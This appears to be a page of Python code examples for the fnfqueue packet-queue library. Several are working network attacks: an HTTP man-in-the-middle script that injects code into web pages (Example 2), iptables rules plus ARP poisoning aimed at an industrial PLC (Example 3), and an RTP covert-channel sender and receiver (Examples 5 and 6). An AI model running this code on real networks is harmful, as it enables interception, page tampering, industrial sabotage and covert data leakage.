Beispiel #1
0
    def __init__(self, queue_num, controller, debug_forward, io):
        Thread.__init__(self)
        self._queue_num = queue_num
        self._debug_direct_forward = debug_forward
        self._executor = ThreadPoolExecutor(max_workers=1000)
        self._controller = controller
        self._io = io

        #test
        self.conn = fnfqueue.Connection()
Beispiel #2
0
def main(code, count):
    connection = fnfqueue.Connection()
    connection.bind(0).set_mode(0xFFFF, fnfqueue.COPY_PACKET)
    code = code.encode()
    i = 0

    for data in connection:
        pkt = scapy.IP(data.payload)
        if pkt.haslayer(scapy.Raw):  # iptables filters TCP
            load = pkt[scapy.Raw].load
            if pkt[scapy.TCP].dport == 80:
                # modify HTTP requests - disable encoding
                pkt[scapy.IP].src = netifaces.ifaddresses('wlan0')[
                    netifaces.AF_INET][0]['addr'].encode()
                load = re.sub(b"HTTP/1.1", b"HTTP/1.0", load)
                load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)
            elif pkt[scapy.TCP].sport == 80:
                # modify HTTP responses - inject code
                load = re.sub(b"</body>", code + b"</body>", load)
                load = re.sub(b"</BODY>", code + b"</BODY>", load)
                cl = re.search(b"(?:Content-Length: )([0-9]*)", load)
                if cl is not None and b"text/html" in load:
                    length = cl.group(1)
                    i += 1
                    load = load.replace(length,
                                        str(int(length) + len(code)).encode())

            pkt[scapy.Raw].load = load
            del pkt[scapy.IP].len
            del pkt[scapy.IP].chksum
            del pkt[scapy.TCP].chksum

            # workaround
            # should be data.payload = bytes(pkt), then data.mangle()
            # but somehow rpi does not mangle the packet
            # just sending packets with scapy and droping original content
            data.drop()
            scapy.send(pkt, verbose=False)

            if i >= count:
                connection.close()
                return
        else:
            data.accept()
Beispiel #3
0
    def setup(self):
        """
        This function start the network attack.

        It first sets up the iptables on the attacker node to capture the tcp packets coming from
        the target PLC. It also drops the icmp packets, to avoid network packets skipping the
        attacker node.

        Afterwards it launches the ARP poison, which basically tells the network that the attacker
        is the PLC, and it tells the PLC that the attacker is the router.

        Finally, it launches the thread that will examine all captured packets.
        """
        os.system(
            f'iptables -t mangle -A FORWARD -p tcp --sport 44818 -s {self.target_plc_ip} -j NFQUEUE --queue-num 1'
        )
        os.system('iptables -A FORWARD -p icmp -j DROP')
        os.system('iptables -A INPUT -p icmp -j DROP')
        os.system('iptables -A OUTPUT -p icmp -j DROP')

        # Launch the ARP poison by sending the required ARP network packets
        launch_arp_poison(self.target_plc_ip,
                          self.intermediate_attack['gateway_ip'])
        if self.intermediate_yaml['network_topology_type'] == "simple":
            for plc in self.intermediate_yaml['plcs']:
                if plc['name'] != self.intermediate_plc['name']:
                    launch_arp_poison(self.target_plc_ip, plc['local_ip'])

        self.logger.debug(
            f"Naive MITM Attack ARP Poison between {self.target_plc_ip} and "
            f"{self.intermediate_attack['gateway_ip']}")

        try:
            self.queue = fnfqueue.Connection()
            self.q = self.queue.bind(1)
            self.q.set_mode(fnfqueue.MAX_PAYLOAD, fnfqueue.COPY_PACKET)
        except PermissionError:
            self.logger.error("Permission Error trying to bind to the NFQUEUE")

        self.run_thread = True
        self.thread = threading.Thread(target=self.packet_thread_function)
        self.thread.start()
Beispiel #4
0
import fnfqueue
import sys

queue = 1

conn = fnfqueue.Connection()

q = conn.bind(queue)
q.set_mode(0xffff, fnfqueue.COPY_PACKET)

print("OK", flush=True)

while True:
    try:
        for packet in conn:
            packet.payload = packet.payload
            packet.accept(fnfqueue.MANGLE_PAYLOAD)
    except fnfqueue.BufferOverflowException:
        print("buffer error")
        pass

conn.close()
Beispiel #5
0
def receiver(verbose, covert_channel):
    # to control the packets
    old_packet = None
    counter_packets = 0
    total_packets = 0

    # to control the length of the message to hide
    secret_message = ''
    first_time = True
    message_finished = False

    # Iptables queue connection
    try:
        queue = 1
        conn = fnfqueue.Connection()
        q = conn.bind(queue)
        q.set_mode(0xffff, fnfqueue.COPY_PACKET)
    except PermissionError:
        print('Are you sure you\'re root or NFQueue is not in use? Exit..')
        exit()

    if covert_channel:
        while True:
            try:
                for act_packet in conn:
                    act_type = int.from_bytes(act_packet.payload[29:30],
                                              byteorder='big')
                    if act_type == RTP_AUDIO or act_type == RTP_VIDEO or not message_finished:
                        total_packets += 1
                        if old_packet is None:
                            old_packet = copy.copy(act_packet)
                        else:
                            old_type = int.from_bytes(
                                old_packet.payload[29:30], byteorder='big')
                            old_seq = int.from_bytes(old_packet.payload[30:32],
                                                     byteorder='big')

                            old_packet.mangle()
                            old_packet = copy.copy(act_packet)
                            counter_packets += 1
                            if verbose == 2:
                                print(
                                    '     * type: {} | seq: {} | counter: {}'.
                                    format(old_type, old_seq, counter_packets))

                            if act_type != old_type:
                                if verbose >= 1:
                                    print(
                                        '- x: {} | type: {} | seq: {} | counter: {}'
                                        .format((counter_packets % 2),
                                                old_type, old_seq,
                                                counter_packets))
                                secret_message += str(counter_packets % 2)
                                counter_packets = 0
                                if (first_time and len(secret_message)
                                        == 7) or (not first_time and
                                                  len(secret_message) == 8):
                                    try:
                                        secret_message = int(secret_message, 2)
                                        secret_message = secret_message.to_bytes(
                                            (secret_message.bit_length() + 7)
                                            // 8, 'big').decode()
                                        if verbose == 0:
                                            sys.stdout.write(
                                                str(secret_message))
                                            sys.stdout.flush()
                                        else:
                                            print(
                                                '+++++++++++++++++++++++++++++++++++++++++++++++ {}'
                                                .format(str(secret_message)))
                                        secret_message = ''
                                        first_time = False
                                    except UnicodeDecodeError:
                                        if verbose == 0:
                                            sys.stdout.write('-UE-')
                                            sys.stdout.flush()
                                        else:
                                            print(
                                                '+++++++++++++++++++++++++++++++++++++++++++++++ -UE-'
                                            )
                                        secret_message = ''
                                        first_time = False
                                    except TypeError:
                                        if verbose == 0:
                                            sys.stdout.write('-TE-')
                                            sys.stdout.flush()
                                        else:
                                            print(
                                                '+++++++++++++++++++++++++++++++++++++++++++++++ -TE-'
                                            )
                                        secret_message = ''
                                        first_time = False
                    elif act_type == 0:
                        message_finished = True
                    else:
                        act_packet.mangle()
            except KeyboardInterrupt:
                conn.close()
                print('bye, bye!')
                exit()
            except:
                pass
    else:
        try:
            for act_packet in conn:
                act_packet.mangle()
        except:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            print('exception: {}: {}'.format(exc_type, exc_tb.tb_lineno))
Beispiel #6
0
def sender(verbose, covert_channel, secret_message):
    # to control the packets
    old_packet = None
    exc_audios = queue.Queue()
    exc_videos = queue.Queue()
    counter_packets = 0
    type_sending = 0

    # to control the length of the message to hide
    counter_bits = 0

    # Iptables queue connection
    try:
        conn = fnfqueue.Connection()
        q = conn.bind(NFQUEUE)
        q.set_mode(0xffff, fnfqueue.COPY_PACKET)
    except PermissionError:
        print('Are you sure you\'re root or NFQueue is not in use? Exit..')
        exit()

    if verbose == 2:
        print('------ SECRET MESSAGE PARITY: {}'.format(secret_message))

    if covert_channel:
        while counter_bits < len(secret_message):
            try:
                for act_packet in conn:
                    act_type = int.from_bytes(act_packet.payload[29:30],
                                              byteorder='big')
                    if act_type == RTP_AUDIO or act_type == RTP_VIDEO:
                        if old_packet is None:
                            old_packet = copy.copy(act_packet)
                            type_sending = int.from_bytes(
                                old_packet.payload[29:30], byteorder='big')
                        else:
                            old_type = int.from_bytes(
                                old_packet.payload[29:30], byteorder='big')
                            old_seq = int.from_bytes(old_packet.payload[30:32],
                                                     byteorder='big')

                            if act_type == old_type and old_type == type_sending:
                                counter_packets += 1
                                if verbose == 2:
                                    print('   > sending because equals')
                                    print(
                                        '     ---- sending type: {} | seq: {} | counter: {}'
                                        .format(old_type, old_seq,
                                                counter_packets))
                                old_packet.mangle()
                                old_packet = copy.copy(act_packet)
                            elif act_type != old_type and old_type == type_sending:
                                parity = ((counter_packets + 1) % 2 == int(
                                    secret_message[counter_bits]))
                                if parity:
                                    old_packet.mangle()
                                    old_packet = copy.copy(act_packet)
                                    if verbose == 2:
                                        print(
                                            '   > sending old because of parity'
                                        )
                                    if verbose >= 1:
                                        print(
                                            '- x: {} | type: {} | seq: {} | counter: {}'
                                            .format((counter_packets + 1) % 2,
                                                    old_type, old_seq,
                                                    (counter_packets + 1)))
                                    counter_packets = 0
                                    counter_bits += 1
                                    type_sending = act_type
                                elif counter_packets == 0:
                                    if verbose == 2:
                                        print(
                                            '   > sending old because must be sent one of this type'
                                        )
                                        print(
                                            '      ---- sending type: {} | seq: {} | counter: {}'
                                            .format(old_type, old_seq,
                                                    (counter_packets + 1)))
                                    old_packet.mangle()
                                    old_packet = copy.copy(act_packet)
                                    counter_packets += 1
                                else:
                                    if verbose == 2:
                                        print(
                                            '   * NOT sending old packet because of parity: {}'
                                            .format(type_sending))
                                    if verbose >= 1:
                                        print(
                                            '- x: {} | type: {} | seq: {} | counter: {}'
                                            .format(counter_packets % 2,
                                                    old_type, old_seq,
                                                    counter_packets))
                                    if old_type == RTP_AUDIO:
                                        exc_audios.put(old_packet)
                                    else:
                                        exc_videos.put(old_packet)
                                    old_packet = copy.copy(act_packet)
                                    counter_packets = 0
                                    counter_bits += 1
                                    type_sending = act_type

                                if not exc_audios.empty(
                                ) and act_type == RTP_AUDIO:
                                    if verbose == 2:
                                        print(
                                            '   + sending excedeed audio packets'
                                        )
                                    counter_packets = 0
                                    while not exc_audios.empty():
                                        exc_packet = exc_audios.get()
                                        exc_seq = int.from_bytes(
                                            exc_packet.payload[30:32],
                                            byteorder='big')
                                        exc_packet.mangle()
                                        counter_packets += 1
                                        if verbose == 2:
                                            print(
                                                '      ---- sending type: {} | seq: {} | counter: {}'
                                                .format(
                                                    act_type, exc_seq,
                                                    counter_packets))
                                if not exc_videos.empty(
                                ) and act_type == RTP_VIDEO:
                                    if verbose == 2:
                                        print(
                                            '   + sending excedeed video packets'
                                        )
                                    counter_packets = 0
                                    while not exc_videos.empty():
                                        exc_packet = exc_videos.get()
                                        exc_seq = int.from_bytes(
                                            exc_packet.payload[30:32],
                                            byteorder='big')
                                        exc_packet.mangle()
                                        counter_packets += 1
                                        if verbose == 2:
                                            print(
                                                '      ---- sending type: {} | seq: {} | counter: {}'
                                                .format(
                                                    act_type, exc_seq,
                                                    counter_packets))

                            elif old_type != type_sending:
                                if verbose == 2:
                                    print(
                                        '   * NOT sending because not same type that should be sending: {}'
                                        .format(type_sending))
                                if old_type == RTP_AUDIO:
                                    exc_audios.put(old_packet)
                                else:
                                    exc_videos.put(old_packet)
                                old_packet = copy.copy(act_packet)
                    else:
                        act_packet.mangle()
            except KeyboardInterrupt:
                conn.close()
                print('bye, bye!')
                exit()
            except IndexError:
                pass
            except:
                exc_type, exc_obj, exc_tb = sys.exc_info()
                print('exception: {}: {}'.format(exc_type, exc_tb.tb_lineno))

        old_packet.payload = old_packet.payload[:29] + bytes(
            [RTP_END]) + old_packet.payload[30:]
        old_packet.mangle()
        print('Missatge enviat')
        try:
            # To continue with the videocall
            for act_packet in conn:
                act_packet.mangle()
        except:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            print('exception: {}: {}'.format(exc_type, exc_tb.tb_lineno))
    else:
        try:
            for act_packet in conn:
                act_packet.mangle()
        except:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            print('exception: {}: {}'.format(exc_type, exc_tb.tb_lineno))